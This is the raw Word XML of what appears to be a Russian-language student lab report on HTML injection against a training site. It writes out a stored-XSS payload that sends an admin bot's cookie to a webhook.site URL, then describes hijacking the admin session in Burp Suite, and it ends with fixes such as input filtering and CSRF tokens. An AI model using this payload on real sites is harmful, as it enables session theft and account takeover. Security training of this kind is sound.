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19EB52CF" w:rsidR="004C720F" w:rsidRPr="00303AE1" w:rsidRDefault="004C720F" w:rsidP="005106B9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303AE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303AE1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303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3B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4.5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5</w:t>
      </w:r>
      <w:r w:rsidR="005106B9"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5533B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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidR="005533B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4.5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5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="009951E5" w:rsidRPr="005106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303AE1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Персонализация: </w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Михайлов Юрий Никитич (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uramihajlov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>481@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B76D5" w14:textId="5E1DFD47" w:rsidR="004C720F" w:rsidRPr="00303AE1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303AE1">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="005106B9" w:rsidRPr="005106B9">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>14.4.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009951E5" w:rsidRPr="00303AE1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303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00303AE1" w:rsidRPr="00303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00303AE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>инъекции</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00303AE1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303AE1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303AE1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>Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504B2FEB" w14:textId="1DD658DC" w:rsidR="004C720F" w:rsidRPr="00303AE1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 xml:space="preserve"> Период тестирования: </w:t>
      </w:r>
      <w:r w:rsidR="005533BF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00303AE1">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.01.2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0E2572" w14:textId="17DF6C48" w:rsid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5533BF" w:rsidRPr="005533BF">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://51.250.73.193:5001</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65286E75" w14:textId="0D059412" w:rsidR="00240FF8" w:rsidRP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303AE1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6FE7BF5" w14:textId="77777777" w:rsidR="00F54557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DD2749F" w14:textId="77777777" w:rsidR="00F54557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CEF2AAC" w14:textId="77777777" w:rsidR="00F54557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4DD0C3AA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41C579AC" w14:textId="3152D01C" w:rsidR="00240FF8" w:rsidRPr="00303AE1" w:rsidRDefault="00303AE1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD98942" w14:textId="0BCFC0BB" w:rsidR="00240FF8" w:rsidRPr="005533BF" w:rsidRDefault="00303AE1" w:rsidP="0015611F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</w:p>
    <w:p w14:paraId="3C216B40" w14:textId="65F217C7" w:rsidR="005533BF" w:rsidRPr="00303AE1" w:rsidRDefault="005533BF" w:rsidP="0015611F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rp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D9FB14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6D70CFB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203505E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9E0216D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40DFF29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14F682E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9951B18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D2C091C" w14:textId="77777777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FA15197" w14:textId="137D5DE5" w:rsidR="00F54557" w:rsidRDefault="00F54557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27F1600" w14:textId="2E7B6A14" w:rsidR="009951E5" w:rsidRDefault="005106B9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1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Зайти и зарегистрироваться на сайте под любым логином</w:t>
      </w:r>
      <w:r w:rsidRPr="0051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аролем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5666EF3D" w14:textId="163ECDF6" w:rsidR="005106B9" w:rsidRPr="005106B9" w:rsidRDefault="005533BF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533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7011B7" wp14:editId="542D0E15">
            <wp:extent cx="6400800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846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5D37B03" w14:textId="6FF84499" w:rsidR="005106B9" w:rsidRP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Заходим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ocation</w:t>
      </w:r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лег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изуча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форму понимаем что она уязвима там нет фильтрации от слова совсем </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A575F" w14:textId="77777777" w:rsidR="00F54557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533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C5652F4" wp14:editId="7C23136E">
            <wp:extent cx="5821251" cy="3255396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72" cy="32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572" w14:textId="0942F269" w:rsid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3 Этап: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6A807269" w14:textId="155FAF12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Готовим наш скрипт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hook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ля того чтоб забрать у администратора его параметр сессии </w:t>
      </w:r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&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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cument.location</w:t>
      </w:r>
      <w:proofErr w:type="gram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='https://webhook.site/3016f4de-4ba1-4154-baca-2d7e76569221</w:t>
      </w:r>
      <w:r w:rsidR="00F54557"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?</w:t>
      </w:r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'+document.co</w:t>
      </w:r>
      <w:r w:rsid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spell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kie</w:t>
      </w:r>
      <w:proofErr w:type="spell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;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spell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cript</w:t>
      </w:r>
      <w:proofErr w:type="spell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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799135D5" w14:textId="002F919C" w:rsidR="005533BF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3BF1B190" wp14:editId="6F49B6FA">
            <wp:extent cx="6400800" cy="4789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B3B" w14:textId="77777777" w:rsidR="005533BF" w:rsidRPr="00F54557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898AE24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DBC0C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4C4AB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21756A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4EE9B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155249" w14:textId="77777777" w:rsidR="00EE0519" w:rsidRPr="0083349C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4EE8E53" w14:textId="63A5720D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</w:p>
    <w:p w14:paraId="5E8AC7C5" w14:textId="2129A061" w:rsidR="005533BF" w:rsidRP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ка бот будет проверять нашу заявку идём на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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ok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 забираем</w:t>
      </w:r>
      <w:r w:rsid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ессию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8FB2C" w14:textId="45C6762B" w:rsidR="00EE0519" w:rsidRPr="00F54557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51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1AAC779" wp14:editId="0A6426EF">
            <wp:extent cx="6400800" cy="2717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8499" w14:textId="6CB0CD98" w:rsidR="00F54557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Этап:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34153A66" w14:textId="70F38284" w:rsidR="00F54557" w:rsidRPr="00F54557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аходим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hook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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опируем сессию идём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rp</w:t>
      </w:r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uite</w:t>
      </w:r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 меняем свою на сессию админа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D299406" w14:textId="65274D76" w:rsidR="005533BF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5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4C44641D" wp14:editId="2305DB5A">
            <wp:extent cx="5512158" cy="2997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442" cy="30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878D" w14:textId="77777777" w:rsidR="00F54557" w:rsidRPr="005533BF" w:rsidRDefault="00F5455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0698F4A8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367789A0" w14:textId="3B93F2AD" w:rsidR="0084365D" w:rsidRDefault="0084365D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436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TML injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B681BF2" w14:textId="686BB499" w:rsidR="0084365D" w:rsidRPr="005533BF" w:rsidRDefault="00CE0E2A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CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC34DE" w14:textId="285A4E02" w:rsidR="005533BF" w:rsidRPr="00CE0E2A" w:rsidRDefault="005533BF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е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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC42A0D" w14:textId="22E7A315" w:rsidR="00240FF8" w:rsidRPr="00303AE1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1C8E12E9" w14:textId="2E921C23" w:rsidR="00240FF8" w:rsidRPr="00CE0E2A" w:rsidRDefault="0084365D" w:rsidP="0015611F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ируйте</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009951E5" w:rsidRPr="00CE0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64E2469" w14:textId="77777777" w:rsidR="00CE0E2A" w:rsidRPr="00CE0E2A" w:rsidRDefault="00CE0E2A" w:rsidP="00CE0E2A">
      <w:pPr>
        <w:spacing w:before="240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ACFC658" w14:textId="6ED7A4BC" w:rsidR="0084365D" w:rsidRPr="00CE0E2A" w:rsidRDefault="0084365D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Фильтруйт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ввод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61D7C345" w14:textId="6EFC4AAB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2352BD30" w14:textId="5FC96F97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токен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CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCADC3B" w14:textId="148EE8F7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38E1E7DF" w14:textId="38EB121E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Проверк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Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00CE0E2A" w:rsidRPr="00CE0E2A" w:rsidSect="005709A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BC0C" w14:textId="77777777" w:rsidR="005A1939" w:rsidRDefault="005A1939" w:rsidP="00D7617F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7C16F46D" w14:textId="77777777" w:rsidR="005A1939" w:rsidRDefault="005A1939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06E72A7-7541-42B4-BDD4-72BC794937E1}"/>
    <w:embedBold r:id="rId2" w:fontKey="{40601E6A-31A7-4377-8586-F311EB03F0BA}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{BC44135B-13B7-4EE1-8756-B9239D987FCB}"/>
    <w:embedBoldItalic r:id="rId4" w:fontKey="{2C4B62E0-FD7B-4B36-B370-AE48354D7A5B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2BB6BA9B-9FC8-4E9F-94A0-0F8DE1DDAECC}"/>
    <w:embedBold r:id="rId6" w:fontKey="{30F28DB2-32D1-4F94-8845-9D10094C5324}"/>
    <w:embedItalic r:id="rId7" w:fontKey="{12F1C248-0FCA-4E86-AF07-D46A49FC4382}"/>
    <w:embedBoldItalic r:id="rId8" w:fontKey="{16AF24F3-CF30-49D5-A0A5-03670E9C78AF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E7B7E06D-F070-4F35-8352-CC247E1A47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0E43C001-2793-4D95-981D-016DF6A7E6F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B035F9E3-5FC8-4FA3-8BFF-8450BC08B38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15C0AC6D-C94B-4438-852D-04142EF1F83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E0CD" w14:textId="77777777" w:rsidR="005A1939" w:rsidRDefault="005A1939" w:rsidP="00D7617F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6E77CB69" w14:textId="77777777" w:rsidR="005A1939" w:rsidRDefault="005A1939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67114"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCF2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28D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6FC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6B9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33BF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1939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7AC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349C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0891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9AA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1A9F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53C7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0E2A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519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4557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5001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8373-DF30-44E8-BDE2-3332BBD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3:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-16T13:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>